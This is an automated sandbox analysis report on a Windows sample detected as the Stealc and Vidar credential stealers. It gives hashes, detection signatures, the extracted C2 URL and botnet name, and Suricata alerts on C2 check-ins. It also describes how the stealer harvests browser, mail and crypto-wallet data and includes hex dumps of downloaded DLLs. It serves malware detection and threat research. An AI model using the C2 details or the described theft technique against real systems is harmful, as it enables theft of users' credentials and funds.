Windows Analysis Report
9JtNIXVedn.exe

Overview

General Information

Sample name: 9JtNIXVedn.exe
renamed because original name is a hash value
Original sample name: 678f666b1f2e04b504d62430f8e95b64.exe
Analysis ID: 1543864
MD5: 678f666b1f2e04b504d62430f8e95b64
SHA1: d8484b6da5c0faf9cb0453f12d34b3c60f03fc69
SHA256: b32b753d94dc0a02f097626fa793432be53d5927d30abc5490a2d44a055670e5
Tags: 32exe

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: 9JtNIXVedn.exe.7776.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.3% probability
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE1A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CE1A9A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE144C0 PK11_PubEncrypt, 0_2_6CE144C0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE14440 PK11_PrivDecrypt, 0_2_6CE14440
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDE4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CDE4420
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6CE625B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDFE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6CDFE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDF8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6CDF8670
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE1A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6CE1A650
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE3A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6CE3A730
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE40180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6CE40180
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE143B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6CE143B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE37C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6CE37C00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDF7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 0_2_6CDF7D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE3BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 0_2_6CE3BD30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE39EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 0_2_6CE39EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE13FF0 PK11_PrivDecryptPKCS1, 0_2_6CE13FF0
Source: 9JtNIXVedn.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 9JtNIXVedn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Malware configuration extractor URLs: http://95.182.96.50/2aced82320799c96.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
